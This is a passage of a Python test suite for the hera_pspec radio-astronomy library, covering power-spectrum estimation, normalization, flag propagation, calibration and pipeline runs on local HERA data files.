bls1, bls2, blp = utils.construct_blpairs(red_bls, exclude_permutations=False, exclude_auto_bls=False)
uvd = copy.deepcopy(self.uvd)
ds = pspecdata.PSpecData(dsets=[uvd, uvd], wgts=[None, None], beam=self.bm)
uvp = ds.pspec(bls1, bls2, (0, 1), ('xx','xx'), spw_ranges=[(20,30), (30,40)], verbose=False)
assert uvp.Nblpairs == 16
assert uvp.Nspws == 2
uvp2 = uvp.select(spws=0, bls=[(24, 25)], only_pairs_in_bls=False, inplace=False)
assert uvp2.Nspws == 1
assert uvp2.Nblpairs == 7
uvp.select(spws=0, bls=(24, 25), only_pairs_in_bls=True, inplace=True)
assert uvp.Nspws == 1
assert uvp.Nblpairs == 1
# check w/ multiple spectral ranges
uvd = copy.deepcopy(self.uvd)
ds = pspecdata.PSpecData(dsets=[uvd, uvd], wgts=[None, None], beam=self.bm)
uvp = ds.pspec(bls, bls, (0, 1), ('xx','xx'), spw_ranges=[(10, 24), (30, 40), (45, 64)], verbose=False)
assert uvp.Nspws == 3
assert uvp.Nspwdlys == 43
assert uvp.data_array[0].shape == (240, 14, 1)
assert uvp.get_data((0, 124125124125, ('xx','xx'))).shape == (60, 14)
uvp.select(spws=[1])
assert uvp.Nspws == 1
assert uvp.Ndlys == 10
assert len(uvp.data_array) == 1
# test polarization pairs
uvd = copy.deepcopy(self.uvd)
ds = pspecdata.PSpecData(dsets=[uvd, uvd], wgts=[None, None], beam=self.bm)
uvp = ds.pspec(bls, bls, (0, 1), ('xx','xx'), spw_ranges=[(10, 24)], verbose=False)
#pytest.raises(NotImplementedError, ds.pspec, bls, bls, (0, 1), pols=[('xx','yy')])
uvd = copy.deepcopy(self.uvd)
ds = pspecdata.PSpecData(dsets=[uvd, uvd], wgts=[None, None], beam=self.bm)
uvp = ds.pspec(bls, bls, (0, 1), [('xx','xx'), ('yy','yy')], spw_ranges=[(10, 24)], verbose=False)
uvd = copy.deepcopy(self.uvd)
ds = pspecdata.PSpecData(dsets=[uvd, uvd], wgts=[None, None], beam=self.bm)
uvp = ds.pspec(bls, bls, (0, 1), (-5, -5), spw_ranges=[(10, 24)], verbose=False)
# test exceptions
pytest.raises(AssertionError, ds.pspec, bls1[:1], bls2, (0, 1), ('xx','xx'))
pytest.raises(ValueError, ds.pspec, bls, bls, (0, 1), pols=('yy','yy'))
uvd1 = copy.deepcopy(self.uvd)
uvd1.polarization_array = np.array([-6])
ds = pspecdata.PSpecData(dsets=[uvd, uvd1], wgts=[None, None], beam=self.bm)
pytest.raises(ValueError, ds.pspec, bls, bls, (0, 1), ('xx','xx'))
# test files with more than one polarizations
uvd1 = copy.deepcopy(self.uvd)
uvd1.polarization_array = np.array([-6])
uvd2 = self.uvd + uvd1
ds = pspecdata.PSpecData(dsets=[uvd2, uvd2], wgts=[None, None], beam=self.bm)
uvp = ds.pspec(bls, bls, (0, 1), [('xx','xx'), ('yy','yy')], spw_ranges=[(10, 24)], verbose=False)
uvd1 = copy.deepcopy(self.uvd)
uvd1.polarization_array = np.array([-6])
uvd2 = self.uvd + uvd1
ds = pspecdata.PSpecData(dsets=[uvd2, uvd2], wgts=[None, None], beam=self.bm)
uvp = ds.pspec(bls, bls, (0, 1), [('xx','xx'), ('xy','xy')], spw_ranges=[(10, 24)], verbose=False)
# test with nsamp set to zero
uvd = copy.deepcopy(self.uvd)
uvd.nsample_array[uvd.antpair2ind(24, 25, ordered=False)] = 0.0
ds = pspecdata.PSpecData(dsets=[uvd, uvd], wgts=[None, None], beam=self.bm)
uvp = ds.pspec([(24, 25)], [(37, 38)], (0, 1), [('xx', 'xx')])
assert np.all(np.isclose(uvp.integration_array[0], 0.0))
# test covariance calculation runs with small number of delays
uvd = copy.deepcopy(self.uvd)
uvd_std = copy.deepcopy(self.uvd_std)
ds = pspecdata.PSpecData(dsets=[uvd, uvd], wgts=[None, None],
dsets_std=[uvd_std, uvd_std], beam=self.bm)
# test covariance methods with non-zero filter_extension
uvp = ds.pspec(bls1[:1], bls2[:1], (0, 1), ('xx','xx'), input_data_weight='identity', norm='I', taper='none',
little_h=True, verbose=True, spw_ranges=[(10,20)], filter_extensions=[(2,2)], symmetric_taper=False, store_cov=True, cov_model='empirical')
assert hasattr(uvp, 'cov_array_real')
key = (0, (bls1[0],bls2[0]), "xx")
# also check the output covariance is uniform along time axis when cov_model='empirical'
assert np.allclose(uvp.get_cov(key)[0], uvp.get_cov(key)[-1])
uvp = ds.pspec(bls1[:1], bls2[:1], (0, 1), ('xx','xx'), input_data_weight='identity', norm='I', taper='none',
little_h=True, verbose=True, spw_ranges=[(10,20)], exact_norm=True, store_cov=True, cov_model='dsets')
assert hasattr(uvp, 'cov_array_real')
# test the results of stats_array[cov_model]
uvp_cov = ds.pspec(bls1[:1], bls2[:1], (0, 1), ('xx','xx'), input_data_weight='identity', norm='I', taper='none',
little_h=True, verbose=True, spw_ranges=[(10,20)], exact_norm=True, store_cov=True, cov_model='foreground_dependent')
uvp_cov_diag = ds.pspec(bls1[:1], bls2[:1], (0, 1), ('xx','xx'), input_data_weight='identity', norm='I', taper='none',
little_h=True, verbose=True, spw_ranges=[(10,20)], exact_norm=True, store_cov_diag=True, cov_model='foreground_dependent')
key = (0, (bls1[0],bls2[0]), "xx")
assert np.isclose(np.diagonal(uvp_cov.get_cov(key), axis1=1, axis2=2), (np.real(uvp_cov_diag.get_stats('foreground_dependent_diag', key)))**2).all()
# test identity_Y caching works
ds = pspecdata.PSpecData(dsets=[copy.deepcopy(self.uvd), copy.deepcopy(self.uvd)], wgts=[None, None],
beam=self.bm)
# assert caching is used when appropriate
uvp = ds.pspec([(24, 25), (24, 25)], [(24, 25), (24, 25)], (0, 1), ('xx', 'xx'),
input_data_weight='identity', norm='I', taper='none', verbose=False,
spw_ranges=[(20, 30)])
assert len(ds._identity_Y) == len(ds._identity_G) == len(ds._identity_H)
assert len(ds._identity_Y) == 1
assert list(ds._identity_Y.keys())[0] == ((0, 24, 25, 'xx'), (1, 24, 25, 'xx'))
# assert caching is not used when inappropriate
ds.dsets[0].flag_array[ds.dsets[0].antpair2ind(37, 38, ordered=False), :, 25, :] = True
uvp = ds.pspec([(24, 25), (37, 38)], [(24, 25), (37, 38)], (0, 1), ('xx', 'xx'),
input_data_weight='identity', norm='I', taper='none', verbose=False,
spw_ranges=[(20, 30)])
assert len(ds._identity_Y) == len(ds._identity_G) == len(ds._identity_H)
assert len(ds._identity_Y) == 2
assert ((0, 24, 25, 'xx'), (1, 24, 25, 'xx')) in ds._identity_Y.keys()
assert ((0, 37, 38, 'xx'), (1, 37, 38, 'xx')) in ds._identity_Y.keys()
def test_normalization(self):
# Test Normalization of pspec() compared to PAPER legacy techniques
d1 = self.uvd.select(times=np.unique(self.uvd.time_array)[:-1:2],
frequencies=np.unique(self.uvd.freq_array)[40:51], inplace=False)
d2 = self.uvd.select(times=np.unique(self.uvd.time_array)[1::2],
frequencies=np.unique(self.uvd.freq_array)[40:51], inplace=False)
freqs = np.unique(d1.freq_array)
# Setup baselines
bls1 = [(24, 25)]
bls2 = [(37, 38)]
# Get beam
beam = copy.deepcopy(self.bm)
cosmo = conversions.Cosmo_Conversions()
# Set to mK scale
d1.data_array *= beam.Jy_to_mK(freqs, pol='XX')[None, None, :, None]
d2.data_array *= beam.Jy_to_mK(freqs, pol='XX')[None, None, :, None]
# Compare using no taper
OmegaP = beam.power_beam_int(pol='XX')
OmegaPP = beam.power_beam_sq_int(pol='XX')
OmegaP = interp1d(beam.beam_freqs/1e6, OmegaP)(freqs/1e6)
OmegaPP = interp1d(beam.beam_freqs/1e6, OmegaPP)(freqs/1e6)
NEB = 1.0
Bp = np.median(np.diff(freqs)) * len(freqs)
scalar = cosmo.X2Y(np.mean(cosmo.f2z(freqs))) * np.mean(OmegaP**2/OmegaPP) * Bp * NEB
data1 = d1.get_data(bls1[0])
data2 = d2.get_data(bls2[0])
legacy = np.fft.fftshift(np.conj(np.fft.fft(data1, axis=1)) * np.fft.fft(data2, axis=1) * scalar / len(freqs)**2, axes=1)[0]
# hera_pspec OQE
ds = pspecdata.PSpecData(dsets=[d1, d2], wgts=[None, None], beam=beam)
uvp = ds.pspec(bls1, bls2, (0, 1), pols=('xx','xx'), taper='none', input_data_weight='identity', norm='I', sampling=True)
oqe = uvp.get_data((0, ((24, 25), (37, 38)), ('xx','xx')))[0]
# assert answers are same to within 3%
assert np.isclose(np.real(oqe)/np.real(legacy), 1, atol=0.03, rtol=0.03).all()
# taper
window = windows.blackmanharris(len(freqs))
NEB = Bp / trapz(window**2, x=freqs)
scalar = cosmo.X2Y(np.mean(cosmo.f2z(freqs))) * np.mean(OmegaP**2/OmegaPP) * Bp * NEB
data1 = d1.get_data(bls1[0])
data2 = d2.get_data(bls2[0])
legacy = np.fft.fftshift(np.conj(np.fft.fft(data1*window[None, :], axis=1)) * np.fft.fft(data2*window[None, :], axis=1) * scalar / len(freqs)**2, axes=1)[0]
# hera_pspec OQE
ds = pspecdata.PSpecData(dsets=[d1, d2], wgts=[None, None], beam=beam)
uvp = ds.pspec(bls1, bls2, (0, 1), ('xx','xx'), taper='blackman-harris', input_data_weight='identity', norm='I')
oqe = uvp.get_data((0, ((24, 25), (37, 38)), ('xx','xx')))[0]
# assert answers are same to within 3%
assert np.isclose(np.real(oqe)/np.real(legacy), 1, atol=0.03, rtol=0.03).all()
def test_broadcast_dset_flags(self):
# setup
fname = os.path.join(DATA_PATH, "zen.all.xx.LST.1.06964.uvA")
uvd = UVData()
uvd.read_miriad(fname)
Nfreq = uvd.data_array.shape[2]
# test basic execution w/ a spw selection
ds = pspecdata.PSpecData(dsets=[copy.deepcopy(uvd), copy.deepcopy(uvd)], wgts=[None, None])
ds.broadcast_dset_flags(spw_ranges=[(400, 800)], time_thresh=0.2)
assert ds.dsets[0].get_flags(24, 25)[:, 550:650].any() == False
# test w/ no spw selection
ds = pspecdata.PSpecData(dsets=[copy.deepcopy(uvd), copy.deepcopy(uvd)], wgts=[None, None])
ds.broadcast_dset_flags(spw_ranges=None, time_thresh=0.2)
assert ds.dsets[0].get_flags(24, 25)[:, 550:650].any()
# test unflagging
ds = pspecdata.PSpecData(dsets=[copy.deepcopy(uvd), copy.deepcopy(uvd)], wgts=[None, None])
ds.broadcast_dset_flags(spw_ranges=None, time_thresh=0.2, unflag=True)
assert ds.dsets[0].get_flags(24, 25)[:, :].any() == False
# test single integration being flagged within spw
ds = pspecdata.PSpecData(dsets=[copy.deepcopy(uvd), copy.deepcopy(uvd)], wgts=[None, None])
ds.dsets[0].flag_array[ds.dsets[0].antpair2ind(24, 25, ordered=False)[3], 0, 600, 0] = True
ds.broadcast_dset_flags(spw_ranges=[(400, 800)], time_thresh=0.25, unflag=False)
assert ds.dsets[0].get_flags(24, 25)[3, 400:800].all()
assert ds.dsets[0].get_flags(24, 25)[3, :].all() == False
# test pspec run sets flagged integration to have zero weight
uvd.flag_array[uvd.antpair2ind(24, 25, ordered=False)[3], 0, 400, :] = True
ds = pspecdata.PSpecData(dsets=[copy.deepcopy(uvd), copy.deepcopy(uvd)], wgts=[None, None])
ds.broadcast_dset_flags(spw_ranges=[(400, 450)], time_thresh=0.25)
uvp = ds.pspec([(24, 25), (37, 38), (38, 39)], [(24, 25), (37, 38), (38, 39)], (0, 1), ('xx', 'xx'),
spw_ranges=[(400, 450)], verbose=False)
# assert flag broadcast above hits weight arrays in uvp
assert np.all(np.isclose(uvp.get_wgts((0, ((24, 25), (24, 25)), ('xx','xx')))[3], 0.0))
# assert flag broadcast above hits integration arrays
assert np.isclose(uvp.get_integrations((0, ((24, 25), (24, 25)), ('xx','xx')))[3], 0.0)
# average spectra
avg_uvp = uvp.average_spectra(blpair_groups=[sorted(np.unique(uvp.blpair_array))], time_avg=True, inplace=False)
# repeat but change data in flagged portion
ds.dsets[0].data_array[uvd.antpair2ind(24, 25, ordered=False)[3], 0, 400:450, :] *= 100
uvp2 = ds.pspec([(24, 25), (37, 38), (38, 39)], [(24, 25), (37, 38), (38, 39)], (0, 1), ('xx', 'xx'),
spw_ranges=[(400, 450)], verbose=False)
avg_uvp2 = uvp.average_spectra(blpair_groups=[sorted(np.unique(uvp.blpair_array))], time_avg=True, inplace=False)
# assert average before and after are the same!
assert avg_uvp == avg_uvp2
def test_RFI_flag_propagation(self):
# generate ds and weights
uvd = copy.deepcopy(self.uvd)
uvd.flag_array[:] = False
Nfreq = uvd.data_array.shape[2]
# Basic test of shape
ds = pspecdata.PSpecData(dsets=[uvd, uvd], wgts=[None, None], beam=self.bm)
test_R = ds.R((1, 37, 38, 'XX'))
assert test_R.shape == (Nfreq, Nfreq)
# First test that turning-off flagging does nothing if there are no flags in the data
bls1 = [(24, 25)]
bls2 = [(37, 38)]
ds = pspecdata.PSpecData(dsets=[uvd, uvd], wgts=[None, None], beam=self.bm, labels=['red', 'blue'])
uvp_flagged = ds.pspec(bls1, bls2, (0, 1), ('xx','xx'), input_data_weight='identity', norm='I', taper='none',
little_h=True, verbose=False)
ds.broadcast_dset_flags(unflag=True)
uvp_unflagged = ds.pspec(bls1, bls2, (0, 1), ('xx','xx'), input_data_weight='identity', norm='I', taper='none',
little_h=True, verbose=False)
qe_unflagged = uvp_unflagged.get_data((0, ((24, 25), (37, 38)), ('xx','xx')))[0]
qe_flagged = uvp_flagged.get_data((0, ((24, 25), (37, 38)), ('xx','xx')))[0]
# assert answers are same to within 0.1%
assert np.isclose(np.real(qe_unflagged)/np.real(qe_flagged), 1, atol=0.001, rtol=0.001).all()
# Test that when flagged, the data within a channel really don't have any effect on the final result
uvd2 = copy.deepcopy(uvd)
uvd2.flag_array[uvd.antpair2ind(24, 25, ordered=False)] = True
ds = pspecdata.PSpecData(dsets=[uvd2, uvd2], wgts=[None, None], beam=self.bm)
uvp_flagged = ds.pspec(bls1, bls2, (0, 1), ('xx','xx'), input_data_weight='identity', norm='I', taper='none',
little_h=True, verbose=False)
uvd2.data_array[uvd.antpair2ind(24, 25, ordered=False)] *= 9234.913
ds = pspecdata.PSpecData(dsets=[uvd2, uvd2], wgts=[None, None], beam=self.bm)
uvp_flagged_mod = ds.pspec(bls1, bls2, (0, 1), ('xx','xx'), input_data_weight='identity', norm='I', taper='none',
little_h=True, verbose=False)
qe_flagged_mod = uvp_flagged_mod.get_data((0, ((24, 25), (37, 38)), ('xx','xx')))[0]
qe_flagged = uvp_flagged.get_data((0, ((24, 25), (37, 38)), ('xx','xx')))[0]
# assert answers are same to within 0.1%
assert np.isclose(np.real(qe_flagged_mod), np.real(qe_flagged), atol=0.001, rtol=0.001).all()
# Test below commented out because this sort of aggressive symmetrization is not yet implemented.
# # Test that flagging a channel for one dataset (e.g. just left hand dataset x2)
# # is equivalent to flagging for both x1 and x2.
# test_wgts_flagged = copy.deepcopy(test_wgts)
# test_wgts_flagged.data_array[:,:,40:60] = 0. # Flag 20 channels
# ds = pspecdata.PSpecData(dsets=[uvd, uvd], wgts=[test_wgts_flagged, test_wgts_flagged], beam=self.bm)
# print "mode alpha"
# uvp_flagged = ds.pspec(bls1, bls2, (0, 1), ('xx','xx'), input_data_weight='diagonal', norm='I', taper='none',
# little_h=True, verbose=False)
# ds = pspecdata.PSpecData(dsets=[uvd, uvd], wgts=[None, test_wgts_flagged], beam=self.bm)
# print "mode beta"
# uvp_flagged_asymm = ds.pspec(bls1, bls2, (0, 1), ('xx','xx'), input_data_weight='diagonal', norm='I', taper='none',
# little_h=True, verbose=False)
# qe_flagged_asymm = uvp_flagged_asymm .get_data(0, ((24, 25), (37, 38)), 'xx')[0]
# qe_flagged = uvp_flagged.get_data(0, ((24, 25), (37, 38)), 'xx')[0]
# #print np.real(qe_flagged_asymm)/np.real(qe_flagged)
# # assert answers are same to within 3%
# assert np.isclose(np.real(qe_flagged_asymm)/np.real(qe_flagged), 1, atol=0.03, rtol=0.03).all()
#print(uvd.data_array.shape)
def test_validate_blpairs(self):
# test exceptions
uvd = copy.deepcopy(self.uvd)
pytest.raises(TypeError, pspecdata.validate_blpairs, [((1, 2), (2, 3))], None, uvd)
pytest.raises(TypeError, pspecdata.validate_blpairs, [((1, 2), (2, 3))], uvd, None)
bls = [(24,25),(37,38)]
bls1, bls2, blpairs = utils.construct_blpairs(bls, exclude_permutations=False, exclude_auto_bls=True)
pspecdata.validate_blpairs(blpairs, uvd, uvd)
bls1, bls2, blpairs = utils.construct_blpairs(bls, exclude_permutations=False, exclude_auto_bls=True,
group=True)
pspecdata.validate_blpairs(blpairs, uvd, uvd)
# test non-redundant
blpairs = [((24, 25), (24, 38))]
pspecdata.validate_blpairs(blpairs, uvd, uvd)
def test_pspec_run():
fnames = [os.path.join(DATA_PATH, d)
for d in ['zen.even.xx.LST.1.28828.uvOCRSA',
'zen.odd.xx.LST.1.28828.uvOCRSA']]
beamfile = os.path.join(DATA_PATH, "HERA_NF_dipole_power.beamfits")
fnames_std = [os.path.join(DATA_PATH,d)
for d in ['zen.even.std.xx.LST.1.28828.uvOCRSA',
'zen.odd.std.xx.LST.1.28828.uvOCRSA']]
# test basic execution
if os.path.exists("./out.h5"):
os.remove("./out.h5")
ds = pspecdata.pspec_run(fnames, "./out.h5", Jy2mK=False,
verbose=False, overwrite=True, dset_pairs=[(0, 1)],
bl_len_range=(14, 15), bl_deg_range=(50, 70),
psname_ext='_0', spw_ranges=[(0, 25)])
psc = container.PSpecContainer('./out.h5')
assert isinstance(psc, container.PSpecContainer)
assert psc.groups() == ['dset0_dset1']
assert psc.spectra(psc.groups()[0]) == ['dset0_x_dset1_0']
assert os.path.exists("./out.h5")
# test Jy2mK, blpairs, cosmo, cov_array, spw_ranges, dset labeling
cosmo = conversions.Cosmo_Conversions(Om_L=0.0)
if os.path.exists("./out.h5"):
os.remove("./out.h5")
ds = pspecdata.pspec_run(fnames, "./out.h5",
dsets_std=fnames_std,
Jy2mK=True,
beam=beamfile,
blpairs=[((37, 38), (37, 38)),
((37, 38), (52, 53))],
verbose=False,
overwrite=True,
pol_pairs=[('xx', 'xx'), ('xx', 'xx')],
dset_labels=["foo", "bar"],
dset_pairs=[(0, 0), (0, 1)],
spw_ranges=[(50, 75), (120, 140)],
n_dlys=[20, 20],
cosmo=cosmo,
trim_dset_lsts=False,
broadcast_dset_flags=False,
cov_model='empirical',
store_cov=True)
# assert groupname is dset1_dset2
psc = container.PSpecContainer('./out.h5')
assert ("foo_bar" in psc.groups())
# assert uvp names are labeled by dset_pairs
assert (sorted(psc.spectra('foo_bar')) \
== sorted([u'foo_x_bar', u'foo_x_foo']))
# get UVPSpec for further inspection
uvp = psc.get_pspec("foo_bar", "foo_x_bar")
# assert Jy2mK worked
assert uvp.vis_units == "mK"
# assert only blpairs that were fed are present
assert uvp.bl_array.tolist() == [137138, 152153]
assert uvp.polpair_array.tolist() == [1515, 1515]
# assert weird cosmology was passed
assert uvp.cosmo == cosmo
# assert cov_array was calculated b/c std files were passed and store_cov
assert hasattr(uvp, 'cov_array_real')
# assert dset labeling propagated
assert set(uvp.labels) == set(['bar', 'foo'])
# assert spw_ranges and n_dlys specification worked
np.testing.assert_array_equal(uvp.get_spw_ranges(), [(163476562.5, 165917968.75, 25, 20), (170312500.0, 172265625.0, 20, 20)])
# test single_dset, time_interleaving, rephasing, flag broadcasting
uvd = UVData()
uvd.read_miriad(fnames[0])
# interleave the data by hand, and add some flags in
uvd.flag_array[:] = False
uvd.flag_array[uvd.antpair2ind(37, 38, ordered=False)[0], 0, 10, 0] = True
uvd.flag_array[uvd.antpair2ind(37, 38, ordered=False)[:3], 0, 15, 0] = True
uvd1 = uvd.select(times=np.unique(uvd.time_array)[::2], inplace=False)
uvd2 = uvd.select(times=np.unique(uvd.time_array)[1::2], inplace=False)
if os.path.exists("./out2.h5"):
os.remove("./out2.h5")
ds = pspecdata.pspec_run([copy.deepcopy(uvd)], "./out2.h5",
blpairs=[((37, 38), (37, 38)), ((37, 38), (52, 53))], interleave_times=True,
verbose=False, overwrite=True, spw_ranges=[(0, 25)], rephase_to_dset=0,
broadcast_dset_flags=True, time_thresh=0.3)
psc = container.PSpecContainer('./out2.h5')
assert isinstance(psc, container.PSpecContainer)
assert psc.groups() == ['dset0_dset1']
assert psc.spectra(psc.groups()[0]) == ['dset0_x_dset1']
assert os.path.exists("./out2.h5")
# assert dsets are properly interleaved
assert np.isclose((np.unique(ds.dsets[0].time_array) - np.unique(ds.dsets[1].time_array))[0],
-np.diff(np.unique(uvd.time_array))[0])
# assert first integration flagged across entire spw
assert ds.dsets[0].get_flags(37, 38)[0, 0:25].all()
# assert first integration flagged *ONLY* across spw
assert ds.dsets[0].get_flags(37, 38)[0, :0].any() + ds.dsets[0].get_flags(37, 38)[0, 25:].any() == False
# assert channel 15 flagged for all ints
assert ds.dsets[0].get_flags(37, 38)[:, 15].all()
# assert phase errors decreased after re-phasing
phserr_before = np.mean(np.abs(np.angle(uvd1.data_array / uvd2.data_array)))
phserr_after = np.mean(np.abs(np.angle(ds.dsets[0].data_array / ds.dsets[1].data_array)))
assert phserr_after < phserr_before
# repeat feeding dsets_std and wgts
if os.path.exists("./out2.h5"):
os.remove("./out2.h5")
ds = pspecdata.pspec_run([copy.deepcopy(uvd)], "./out2.h5", dsets_std=[copy.deepcopy(uvd)],
blpairs=[((37, 38), (37, 38)), ((37, 38), (52, 53))], interleave_times=True,
verbose=False, overwrite=True, spw_ranges=[(0, 25)], rephase_to_dset=0,
broadcast_dset_flags=True, time_thresh=0.3)
# assert ds passes validation
psc = container.PSpecContainer('./out2.h5')
assert ds.dsets_std[0] is not None
ds.validate_datasets()
assert os.path.exists("./out2.h5")
os.remove("./out2.h5")
# test lst trimming
if os.path.exists("./out2.h5"):
os.remove("./out2.h5")
uvd1 = copy.deepcopy(uvd)
uvd2 = uvd.select(times=np.unique(uvd.time_array)[2:], inplace=False)
ds = pspecdata.pspec_run([copy.deepcopy(uvd1), copy.deepcopy(uvd2)], "./out2.h5",
blpairs=[((37, 38), (37, 38)), ((37, 38), (52, 53))],
verbose=False, overwrite=True, spw_ranges=[(50, 100)],
trim_dset_lsts=True)
# assert first uvd1 lst_array got trimmed by 2 integrations
psc = container.PSpecContainer('./out2.h5')
assert ds.dsets[0].Ntimes == 8
assert np.isclose(np.unique(ds.dsets[0].lst_array), np.unique(uvd2.lst_array)).all()
if os.path.exists("./out2.h5"):
os.remove("./out2.h5")
# test when no data is loaded in dset
if os.path.exists("./out.h5"):
os.remove("./out.h5")
ds = pspecdata.pspec_run(fnames, "./out.h5", Jy2mK=False, verbose=False, overwrite=True,
blpairs=[((500, 501), (600, 601))]) # blpairs that don't exist
assert ds == None
assert os.path.exists("./out.h5") == False
# same test but with pre-loaded UVDatas
uvds = []
for f in fnames:
uvd = UVData()
uvd.read_miriad(f)
uvds.append(uvd)
ds = pspecdata.pspec_run(uvds, "./out.h5", dsets_std=fnames_std, Jy2mK=False, verbose=False, overwrite=True,
blpairs=[((500, 501), (600, 601))])
assert ds == None
assert os.path.exists("./out.h5") == False
# test when data is loaded, but no blpairs match
if os.path.exists("./out.h5"):
os.remove("./out.h5")
ds = pspecdata.pspec_run(fnames, "./out.h5", Jy2mK=False, verbose=False, overwrite=True,
blpairs=[((37, 38), (600, 601))])
assert isinstance(ds, pspecdata.PSpecData)
assert os.path.exists("./out.h5") == False
# test glob-parseable input dataset
dsets = [os.path.join(DATA_PATH, "zen.2458042.?????.xx.HH.uvXA"),
os.path.join(DATA_PATH, "zen.2458042.?????.xx.HH.uvXA")]
if os.path.exists("./out.h5"):
os.remove("./out.h5")
ds = pspecdata.pspec_run(dsets, "./out.h5", Jy2mK=False, verbose=True, overwrite=True,
blpairs=[((24, 25), (37, 38))])
psc = container.PSpecContainer('./out.h5', 'rw')
uvp = psc.get_pspec("dset0_dset1", "dset0_x_dset1")
assert uvp.Ntimes == 120
if os.path.exists("./out.h5"):
os.remove("./out.h5")
# test input calibration
dfile = os.path.join(DATA_PATH, "zen.2458116.30448.HH.uvh5")
cfile = os.path.join(DATA_PATH, "zen.2458116.30448.HH.flagged_abs.calfits")
ds = pspecdata.pspec_run([dfile, dfile], "./out.h5", cals=cfile, dsets_std=[dfile, dfile],
verbose=False, overwrite=True, blpairs=[((23, 24), (24, 25))],
pol_pairs=[('xx', 'xx')], interleave_times=False,
file_type='uvh5', spw_ranges=[(100, 150)], cal_flag=True)
psc = container.PSpecContainer('./out.h5', 'rw')
uvp = psc.get_pspec('dset0_dset1', 'dset0_x_dset1')
# test calibration flags were propagated to test that cal was applied
assert ds.dsets[0].flag_array.any()
assert ds.dsets[1].flag_array.any()
assert ds.dsets_std[0].flag_array.any()
assert ds.dsets_std[1].flag_array.any()
assert ds.dsets[0].extra_keywords['filename'] is not '""'
assert ds.dsets[0].extra_keywords['calibration'] is not '""'
assert 'cal: /' in uvp.history
# test w/ conjugated blpairs
dfile = os.path.join(DATA_PATH, "zen.2458116.30448.HH.uvh5")
ds = pspecdata.pspec_run([dfile, dfile], "./out.h5", cals=cfile, dsets_std=[dfile, dfile],
verbose=False, overwrite=True, blpairs=[((24, 23), (25, 24))],
pol_pairs=[('xx', 'xx')], interleave_times=False,
file_type='uvh5', spw_ranges=[(100, 150)], cal_flag=True)
psc = container.PSpecContainer('./out.h5', 'rw')
uvp = psc.get_pspec('dset0_dset1', 'dset0_x_dset1')
assert uvp.Nblpairs == 1
# test exceptions
pytest.raises(AssertionError, pspecdata.pspec_run, 'foo', "./out.h5")
pytest.raises(AssertionError, pspecdata.pspec_run, fnames, "./out.h5", blpairs=(1, 2), verbose=False)
pytest.raises(AssertionError, pspecdata.pspec_run, fnames, "./out.h5", blpairs=[1, 2], verbose=False)
pytest.raises(AssertionError, pspecdata.pspec_run, fnames, "./out.h5", beam=1, verbose=False)
# test execution with list of files for each dataset and list of cals
if os.path.exists("./out.h5"):
os.remove("./out.h5")
fnames = glob.glob(os.path.join(DATA_PATH, "zen.2458116.*.HH.uvh5"))
cals = glob.glob(os.path.join(DATA_PATH, "zen.2458116.*.HH.flagged_abs.calfits"))
ds = pspecdata.pspec_run([fnames, fnames], "./out.h5", Jy2mK=False,
verbose=False, overwrite=True, file_type='uvh5',
bl_len_range=(14, 15), bl_deg_range=(0, 1),
psname_ext='_0', spw_ranges=[(0, 25)], cals=[cals, cals])
psc = container.PSpecContainer('./out.h5', 'rw')
assert isinstance(psc, container.PSpecContainer)
assert psc.groups() == ['dset0_dset1']
assert psc.spectra(psc.groups()[0]) == ['dset0_x_dset1_0']
assert os.path.exists("./out.h5")
if os.path.exists("./out.h5"):
os.remove("./out.h5")
# test with cov_model that requires autos w/ fname as filepath
fnames = glob.glob(os.path.join(DATA_PATH, "zen.even.xx.LST.1.28828.uvOCRSA"))
pspecdata.pspec_run([fnames], "./out.h5", spw_ranges=[(50, 70)], dset_pairs=[(0, 0)],
verbose=False, overwrite=True, file_type='miriad', pol_pairs=[('xx', 'xx')],
blpairs=[((37, 38), (37, 38))], cov_model='foreground_dependent', store_cov=True)
psc = container.PSpecContainer("out.h5", keep_open=False)
uvp = psc.get_pspec('dset0', 'dset0_x_dset0')
assert hasattr(uvp, 'cov_array_real')
os.remove('out.h5')
def test_input_calibration():
dfiles = sorted(glob.glob(os.path.join(DATA_PATH, "zen.2458116.30*.HH.uvh5")))
cfiles = sorted(glob.glob(os.path.join(DATA_PATH, "zen.2458116.30*.HH.flagged_abs.calfits")))
for i, f in enumerate(zip(dfiles, cfiles)):
uvd = UVData()
uvd.read(f[0])
dfiles[i] = uvd
uvc = UVCal()
uvc.read_calfits(f[1])
cfiles[i] = uvc
# test add
pd = pspecdata.PSpecData()
pd.add(dfiles, None) # w/o cal
pd.add([copy.deepcopy(uv) for uv in dfiles], None, cals=cfiles, cal_flag=False) # with cal
g = (cfiles[0].get_gains(23, 'x') * np.conj(cfiles[0].get_gains(24, 'x'))).T
np.testing.assert_array_almost_equal(pd.dsets[0].get_data(23, 24, 'xx') / g,
pd.dsets[1].get_data(23, 24, 'xx'))
# test add with dictionaries
pd.add({'one': copy.deepcopy(dfiles[0])}, {'one': None}, cals={'one':cfiles[0]}, cal_flag=False)
np.testing.assert_array_almost_equal(pd.dsets[0].get_data(23, 24, 'xx') / g,
pd.dsets[2].get_data(23, 24, 'xx'))
# test dset_std calibration
pd.add([copy.deepcopy(uv) for uv in dfiles], None, dsets_std=[copy.deepcopy(uv) for uv in dfiles],
cals=cfiles, cal_flag=False)
np.testing.assert_array_almost_equal(pd.dsets[0].get_data(23, 24, 'xx') / g,
pd.dsets_std[3].get_data(23, 24, 'xx'))
# test exceptions
pd = pspecdata.PSpecData()
pytest.raises(TypeError, pd.add, {'one': copy.deepcopy(dfiles[0])}, {'one': None},
cals='foo', cal_flag=False)
pytest.raises(AssertionError, pd.add, dfiles, [None], cals=[None, None])
pytest.raises(TypeError, pd.add, dfiles, [None], cals=['foo'])
def test_window_funcs():
"""
Test window function computation in ds.pspec()
This is complementary to test_get_MW above.
"""
# get a PSpecData
uvd = UVData()
uvd.read_miriad(os.path.join(DATA_PATH, 'zen.even.xx.LST.1.28828.uvOCRSA'))
beam = pspecbeam.PSpecBeamUV(os.path.join(DATA_PATH, "HERA_NF_dipole_power.beamfits"))
ds = pspecdata.PSpecData(dsets=[copy.deepcopy(uvd)], beam=beam)
ds.set_spw((0, 20))
ds.set_taper('bh')
bl = (37, 38)
key = (0, bl, 'xx')
d = uvd.get_data(bl)
C = np.cov(d[:, :20].T).real
iC = np.linalg.pinv(C)
# iterate over various R and M matrices and ensure
# normalization and dtype is consistent
for data_weight in ['identity', 'iC']:
ds.set_weighting(data_weight)
for norm in ['H^-1', 'I', 'V^-1/2']:
for exact_norm in [True, False]:
if exact_norm and norm != 'I':
# exact_norm only supported for norm == 'I'
continue
ds.clear_cache()
if data_weight == 'iC':
# fill R with iC
